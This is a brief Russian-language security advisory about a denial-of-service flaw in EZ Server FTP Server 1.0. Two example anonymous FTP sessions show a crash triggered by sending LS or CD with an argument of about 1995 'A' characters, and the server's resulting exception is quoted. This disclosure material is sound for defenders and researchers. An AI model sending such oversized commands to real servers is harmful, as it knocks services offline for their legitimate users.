Security Corporation сообщил о DoS уязвимости в EZ Server. Удаленный
пользователь может аварийно завершить работу сервера. 

Как сообщается, удаленный авторизованный пользователь, включая анонимного
пользователя, может подключится к FTP серверу и выполнить FTP команды, типа
LS или CD с буфером 1994 или 1995 байт или выше, чтобы аварийно завершить
работу сервера. 

Примеры: 

C:\>ftp target 
Connected to target. 
220 EZ FTP Server ready. 
User (target:(none)): anonymous 
331 Password required for anonymous. 
Password: 
230 User anonymous logged in. 
ftp> ls AAAAAAA… (1995 символов)

C:\>ftp target 
Connected to target. 
220 EZ FTP Server ready. 
User (target:(none)): anonymous 
331 Password required for anonymous. 
Password: 
230 User anonymous logged in. 
ftp> cd AAAAAAA… (1995 символов)

— This is the error that the EZ FTP Server will produce: 

Exception EFtpCtrlSocketException in module ezserver.exe at 0005A6A6 
Data in buffer, can’t change size. 

Уязвимость обнаружена в EZ Server FTP Server 1.0.



Оставить мнение